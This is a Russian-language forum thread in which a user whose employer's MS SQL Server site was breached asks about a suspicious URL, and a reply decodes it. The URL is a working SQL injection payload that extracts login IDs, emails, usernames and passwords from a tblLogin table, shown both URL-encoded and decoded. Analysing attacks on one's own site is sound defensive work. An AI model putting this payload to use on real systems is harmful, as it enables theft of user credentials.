|
|
|
 |
 |
Сообщение |
 |
|
 |
 |
Книжник
Зарегистрирован:
15 November 2007
Сообщения: 165
Примеры кода: 0
|
RE: хакнули датабазу , помогите.. |
30 June 2008 17:46 |
|
|
|
|
У меня на работе хакнули сайт , шеф негодует , подскажите что это ? SQL injection понятно , но если кто сталкивался помогите , обьясните неопытному
Сайт на MS SQL Server, VB.NET
Что это %5B ? %5D? %20 пробел я так понял ..
tblLogin , LoginID , Password , это он подобрал , остальное неверно , к примеру Order ...
http://www.сайт.ru/detail.aspx?id=1465%20And%20char(124)%2b(Select%20Top%201%20isNull(cast(%5BLoginID%5D%20as%20varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast(%5BEmail%5D%20as%20varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast(%5BUsername%5D%20as%20varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast(%5BPassword%5D%20as%20varchar(8000)),char(32))%20From%20(Select%20Top%2017161%20%5BLoginID%5D,%5BEmail%5D,%5BUsername%5D,%5BPassword%5D%20From%20%5BНАЗВАНИЕДАТАБАЗЫ%5D..%5BtblLogin%5D%20Where%201=1%20Order%20by%20%5BLoginID%5D%20)%20T%20Order%20by%20%5BLoginID%5D%20desc)%3E0
Примерно правильно ты понял.
Если раскрыть аски, то будет примерно следующее
id=1465 And |+(Select Top 1 isNull(cast([LoginID] as varchar(8000)),' ')+|+isNull(cast([Email] as varchar(8000)),' ')+|+isNull(cast([Username] as varchar(8000)),' ')+|+isNull(cast([Password] as varchar(8000)),' ') From (Select Top 17161 [LoginID],[Email],[Username],[Password] From [НАЗВАНИЕДАТАБАЗЫ]..[tblLogin] Where 1=1 Order by [LoginID] ) T Order by [LoginID] desc)>0
под ' ' я обозначил тоже пробелы (char(32))
В тексте запроса уж рассматривай сам. % всякие можно, например, глядеть здесь
http://doc.aqua.comptek.ru/hwb/table/ascii.html
так же, как, впрочем, и char(...)
Отец, конечно, сам может. Но у быка лучше получается.
|
|
| Наверх |
|
|
|
|
 |
 |
 |
|
|